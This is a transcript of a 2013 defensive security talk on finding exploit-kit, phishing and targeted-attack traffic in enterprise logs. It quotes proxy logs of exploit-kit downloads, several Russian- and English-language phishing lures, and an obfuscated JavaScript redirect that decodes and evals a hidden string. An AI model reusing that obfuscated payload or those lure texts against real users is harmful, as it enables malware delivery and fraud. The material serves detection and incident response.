Phd III - defending enterprise
Transcript of Phd III - defending enterprise
![Page 1: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/1.jpg)
DISSECTING RAW DATA: finding needles in the haystack
or the way to survive in the Dangerous Russian Environment
Fyodor Yarochkin, Vladimir Kropotov, Vitaly Chetvertakov. May 2013, Moscow
![Page 2: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/2.jpg)
About the speakers
Common interest: investigating unlawful activities for fun and profit ;-)
We can't spell. All mistakes are ours :)
All the pictures used in this prezo are (c) googled ;-)
![Page 3: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/3.jpg)
Agenda
● Methodology of dealing with emerging threats
● Case studies
● Automation techniques and tools
● Q&A
![Page 4: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/4.jpg)
Overview
● Prepare: understand threats
● Detect: real-time visibility
● Protect: you are owned. Your actions?
● Investigate: owned, finding who targets you, what data they want, what has been compromised
![Page 5: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/5.jpg)
Getting ready :)
PREPARE
![Page 6: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/6.jpg)
Initial network compromise: threats
● DbD attacks
● Email as attack vector
● Direct attacks against servers
Client-targeting attacks are on the rise: EASY! Bigger number of targets! Users' cumulative IQ < 0! ;-)
![Page 7: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/7.jpg)
Drive-by in a nutshell :)
● Visit an infected site (any banner network can be a lead too)
● Traffic distribution/TDS (not compulsory)
● Target identification (JavaScript exploit selection)
● Exploit
● Payload (.exe)
● Profit!
STILL BIG!!
![Page 8: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/8.jpg)
DBD attacks
Before...
● Easy to collect samples
● Payload sent over the wire in plain
● Easy to automate analysis with a sandbox
Now
● Payload is typically encoded (XOR) or encrypted
● Exploit triggered on user events
● Serve once per IP, blacklisting
![Page 9: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/9.jpg)
APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT!
![Page 10: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/10.jpg)
So, what is APT?
Someone wants YOUR stuff :-)
![Page 11: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/11.jpg)
Drive-by.. are you a target?
APT:
● A single exploit
● Served to a limited range of IP addresses (sometimes)
● Payload behaviour is very specific
Not APT:
● Exploit packs
● Generic exploit packs (Redkit, Neutrino, the famous Blackhole, etc.)
● Payloads vary
![Page 12: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/12.jpg)
APT-related drive-by example
● Does not include many exploits
● Is not using any off-the-shelf exploit pack
● Exploit code changes often
![Page 13: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/13.jpg)
APT example (cont.)
● Binary pattern payload. VM sandbox detection
![Page 14: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/14.jpg)
Call-back analysis
![Page 15: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/15.jpg)
Bot vs Human
![Page 16: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/16.jpg)
Exploit packs and kits
![Page 17: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/17.jpg)
Bodyless Bot
![Page 18: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/18.jpg)
Exploit kits in your log

```
GET;http://demonsstoryboard.pw/80F5;HTTP/1.1 95.211.7.3 200 57505 http://234x120.adv.vz.ru/cgi-bin/iframe/vz?1787&options=N Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://demonsstoryboard.pw/080F5wj;HTTP/1.1 95.211.7.3 200 20380 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/java-archive
GET;http://demonsstoryboard.pw/180F5wj;HTTP/1.1 95.211.7.3 200 135534 - Java/1.7.0_07 application/octet-stream
```
![Page 20: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/20.jpg)
Cross-domain
![Page 21: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/21.jpg)
```
GET;http://teware.info/crossdomain.xml;HTTP/1.1 62.109.7.187 200 391 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows) text/xml
GET;http://teware.info/counter/hit/client_de5df061c99066d82cfc437f2b099455;HTTP/1.1 62.109.7.187 200 826 http://www.divetour.su/admin/lang/EN/logit.swf Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://isxops.info/ocycytyruwewufibegidutivabi;HTTP/1.1 82.146.56.201 200 27206 http://www.divetour.su/ Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://tolizuhifa.ghmarspi.in.ua/izijyqyzoxym;HTTP/1.1 188.120.230.94 200 9926 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/3dr
GET;http://tolizuhifa.ghmarspi.in.ua/ebyhoducibe;HTTP/1.1 188.120.230.94 200 164332 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/executable
```
```
GET;http://dapru.crackedsidewalks.com/viewforum.php?b=75c3d28;HTTP/1.1 37.9.52.21 200 949 http://verygoodcom.net/forum/viewtopic.php?f=31363995&t=45869451 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://dapru.crackedsidewalks.com/profile.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1 37.9.52.21 200 647 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/java-archive
GET;http://dapru.crackedsidewalks.com/y41gr.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1 37.9.52.21 403 295 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 -
```
![Page 26: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/26.jpg)
Get 0wned quick!
![Page 27: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/27.jpg)
Domain-rotation techniques
![Page 28: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/28.jpg)
Domain rotation victims
● Over 500 compromised domains in 24 hours
● Domain rotation once per minute (3 minutes in the other incident)
![Page 31: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/31.jpg)
TDS injections
![Page 32: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/32.jpg)
```
GET;http://ctgwllr.changeip.name/googlestat.php;HTTP/1.1 37.10.104.72 200 640 http://www.english-shoes.ru/products/41/ Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://ctgwllr.changeip.name/uqrojdt/2;HTTP/1.1 37.10.104.72 200 442 http://www.english-shoes.ru/products/41/ Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html;HTTP/1.1 31.7.184.194 200 1578 3 http://ctgwllr.changeip.name/uqrojdt/2 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5;HTTP/1.1 31.7.184.194 200 466 http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/901212121255;HTTP/1.1 31.7.184.194 200 1001 http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/text.jar;HTTP/1.1 31.7.184.194 200 8772 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/x-jar
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/0256000045/6799928;HTTP/1.1 31.7.184.194 200 8636 4 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/java-archive
```
![Page 34: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/34.jpg)
Electronic mail as attack vector
● Email is another common method for an adversary to put a foot into the target network.
● Attractiveness:
● Low profile (you only send emails to those who you want to compromise)
● Easy antivirus bypass (password-packed zip archives, anyone? :)
● Users are generally – idiots ;-)
![Page 35: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/35.jpg)
Email as attack vector.. are you a target?
APT?
● Single exploit
● Content of the mail is accurate to context
● Specific payload behaviour (stats)
Non-targeted
● Mass-mailed
● Often no exploit used (.exe in attach)
![Page 36: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/36.jpg)
APT through email.. an RTF document (CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability")
● Payload writes a DLL file
● Recent build date (2013)
● Autorun for persistence
● Calls back to a C2 server group
● Suspicious user agents:
Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)
Mozilla/4.0 (compatible; MSIE 5.0.2)
Mozilla/4.0 (compatible)
![Page 37: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/37.jpg)
How to catch...
● Suspicious agents – works nicely (and easy to implement with Snort, Suricata, etc.)
● Time-series traffic analysis
Emerging Threats has a large number of APT-related sigs. Take and modify :)
![Page 38: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/38.jpg)
Owning a network..
● Vulnerabilities seen in use through this attack vector:
Adobe Acrobat Reader: CVE-2013-0640, CVE-2012-0775
Adobe Flash Player: CVE-2012-1535
MS Office: CVE-2012-0158, CVE-2011-1269, CVE-2010-3333, CVE-2009-3129
Java: CVE-2013-0422, CVE-2012-1723, CVE-2012-5076
![Page 39: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/39.jpg)
But...
● Human stupidity is exploited more than ever..
![Page 40: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/40.jpg)
Email with a password protected archive or a document
● Password protected archives bypass AV checks, firewall/WAF/.. detection
● No exploit. The executable file is masked as a document (icon, extension)
● Message contents motivates user to open the attachment (social engineering)
![Page 41: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/41.jpg)
Let's look at some examples

Good afternoon,
According to the results of a review, our company has found that it owes you 9540 rubles for January. Our chief accountant has drawn up a reconciliation statement and asks you to sign this statement and send back its scan. She also asks what it would be best to write when transferring the funds.
_____________________________________________________________________________________
Sincerely, Commercial Director of ОАО "М-ТОРГ", Маркина Ольга Алексеевна
P.S. The reconciliation statement is attached to the letter; the archive password is 111.
![Page 42: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/42.jpg)
Examples (cont...)

Good afternoon,
According to the results of an audit, our company has found that it owes you 49540 rubles for December 2012. Our chief accountant has drawn up a reconciliation statement and asks you to sign this statement and send back its scan. She also asks what it would be best to write when transferring the funds.
_______________________________________________________________________________
Sincerely, Accountant of ЗАО "МСК", Калинина Вера Владимировна
P.S. The reconciliation statement is attached to the letter; the archive password is 123.
![Page 43: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/43.jpg)
Unpacked file
.. and inside archive :)
![Page 44: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/44.jpg)
Another example

Subject: British Airways E-ticket receipts
e-ticket receipt
Booking reference: 05V9363845
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
![Page 45: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/45.jpg)
Another variation: email that contains masked links to malicious pages
• No attachment. The message is html/text and points to the same resource
• All links are 'masked' to appear to point to legit links
• The same attractive text in the message
![Page 46: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/46.jpg)
Encoded redirect..

```html
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,103,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];if(window.document)for(i=2-2;-i+104!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script>
</body>
</html>
```
![Page 47: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/47.jpg)
Hot topic for a big company: the Cyprus crisis

Diana Ayala saw this story on the BBC News website and thought you should see it.
** Cyprus bailout: bank levy passed parliament already! **
Cyprus can amend terms to a bailout deal that has sparked huge public anger....
< http://www.bbc.com.us/go/em/news/world-cyprus-57502820>
** BBC Daily E-mail **
Choose the news and sport headlines you want - when you want them, all in one daily e-mail
< http://www.bbc.co.uk/email>
** Disclaimer **
The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here
![Page 48: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/48.jpg)
This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Tusesday, 5:00pm
Tracking Number (if one is available for this package): 1Z023R961390411904
Details: Click here to view and/or modify order
We will notify you via email if the status of your delivery changes.
--------------------------------------------------------------------------------
Access these and other valuable tools at support.ADP.com:
o Payroll and Tax Calculators
o Order Payroll Supplies, Blank Checks, and more
o Submit requests online such as SUI Rate Changes, Schedule Changes, and more
o Download Product Documentation, Manuals, and Forms
o Download Software Patches and Updates
o Access Knowledge Solutions / Frequently Asked Questions
o Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP.com
--------------------------------------------------------------------------------
This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.
![Page 49: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/49.jpg)
What happens if you click..
![Page 50: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/50.jpg)
So once we have the basic knowledge, let's move on :)
DETECT
![Page 51: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/51.jpg)
We will spend a bit more time discussing detection activities.
Because this is what we primarily do :)
![Page 52: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/52.jpg)
So how do you detect attacks in your traffic..
![Page 53: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/53.jpg)
What to look for..
• Search for randomly generated domains
• Search for 3rd-level domains with dynamic DNS prefixes (dyndns, dnsdojo, etc.)
• Search by known malware IPs
• Search by known constant parts in URLs and domain names
• Search by intermediate domains used in the attack
![Page 54: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/54.jpg)
Common counter-detection techniques
• Banner network simulation
• DGA-generated domains
• Compromised domains
• dyndns
• Time-based redirects (9 till 6pm Moscow time)
• Using non-standard ports
• Once per IP per day
• Blacklists (Yes! They blacklist us too)
![Page 55: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/55.jpg)
Things to look for..
1) MIME type
• application/java-archive, application/x-jar, application/3dr for Java exploits
• application/pdf for Acrobat Reader exploits
• application/x-shockwave-flash for Adobe Flash Player
2) User agent (Mozilla (Windows ...))
![Page 56: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/56.jpg)
Example..
Other things to pay attention to...
• Exploit code/malware components in the Temp folder
• Activity of installer malware
• Detect brute-force attacks on standard accounts: admin, guest
• Look for other suspicious IDS events: HTTP_Probe, SMB_Probes, etc.
![Page 59: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/59.jpg)
Antivirus finds an exploit in the cache -> we were attacked -> antivirus saves us! ;-)
The exploit can be in the cache – AV finds it :)
AV logs – useful ;)
![Page 60: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/60.jpg)
Antivirus detects malware modules
![Page 61: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/61.jpg)
PROTECT
![Page 62: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/62.jpg)
Approaches
Identify impact and isolate impacted machines
Exploit features of exploit kits to immunize your network
![Page 63: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/63.jpg)
Attacker wants to serve once per IP...
● Automate visits to exploit pack serving points from your Client Honeybox/VM.
● Magic – exploit is not served to your users anymore.
![Page 64: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/64.jpg)
Exploiting redundancy properties in malware distribution and post-infection activity campaigns
![Page 65: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/65.jpg)
INVESTIGATE
![Page 66: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/66.jpg)
DNSLyzer
http://github.com/fygrave/dnslyzer/
![Page 67: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/67.jpg)
Not only the payload is used for transport (covert channel in the URL)
● GET hxxp://lionsholders.biz/st.php?os=windows%207&browser=msie&browserver=8.0&adobe%20reader=10.1&adobe%20flash=11.7.700.169&windows%20media%20player=12.0.7601.17514&java=0&silverlight=0
![Page 68: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/68.jpg)
GET READY FOR AV TROLL!! :)
![Page 69: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/69.jpg)
Strange things happen on the wire ;)
Useful tools
● AOL Moloch https://github.com/aol/moloch
![Page 73: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/73.jpg)
APT mail
● Xecure-lab APT document scanner
![Page 74: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/74.jpg)
TIPS
![Page 75: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/75.jpg)
Encrypted payload in non-targeted attacks
● If the full attack session was not collected (e.g. traffic dumps), don't waste the vendor's time
● Block all unrecognized/uncategorized content (default deny), or you get FNs at all intermediate (transit) hosts
![Page 76: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/76.jpg)
Be careful sharing/checking samples online, especially for targeted attacks
● Vendors share while attackers monitor changes
● FP ~ you shared some internal stuff (especially non-executable files, like office documents) with a third party = security policy violation
![Page 77: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/77.jpg)
Monitoring VS Protection
● Strange, but true
Efficiency(Monitoring) ~ O(1/Efficiency(Protection))
![Page 78: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/78.jpg)
Incident mitigation VS investigation
● If your preparation is not enough: Efficiency(Mitigation) ~ O(1/Efficiency(Investigation))
● If you are prepared, almost all steps of the investigation can be done asynchronously
![Page 79: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/79.jpg)
DISCLAIMER
Tracking activity of the organization in 3rd-party networks
● The examples in the presentation relate to incidents in third-party networks and were reproduced in an environment desirable to the attacker, but adapted.
![Page 80: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/80.jpg)
Q & A